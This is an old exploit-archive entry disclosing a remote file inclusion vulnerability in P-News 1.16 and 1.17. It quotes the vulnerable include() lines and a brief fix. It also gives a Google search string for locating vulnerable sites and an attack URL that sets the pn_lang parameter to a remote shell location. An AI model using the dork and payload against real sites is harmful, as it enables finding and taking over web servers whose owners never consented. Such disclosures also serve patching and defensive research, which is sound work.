[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : P-News <= 1.16 Remote File Include Vulnerability
# Published : 2006-10-16
# Author : vegas78
# Previous Title : Specimen Image Database (client.php) Remote File Include Vulnerability
# Next Title : phpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities


============================================
P-News 1.16, 1.17 Remote File Inclusion Vulnerability
============================================

Discovered by vegas78 - feel82[at]web.de
============================================
Greetz: scoper, corny, smaesch0r, Sascha Schmalz, 
        ReFleCtion, BleX, |pupi (?),   
============================================

include("$pn_lang/functions.php"); // bad code
include("$pn_lang/language.php"); // bad code
...

fix:
make absolute path declaration or update to the new 2.* version

// Google string
allintitle:"P-news ver. 1.16" / allinurl:p-news.php

================================================================

http://site/p-news.php?pn_lang=[shell]

================================================================

# www.Syue.com [2006-10-16]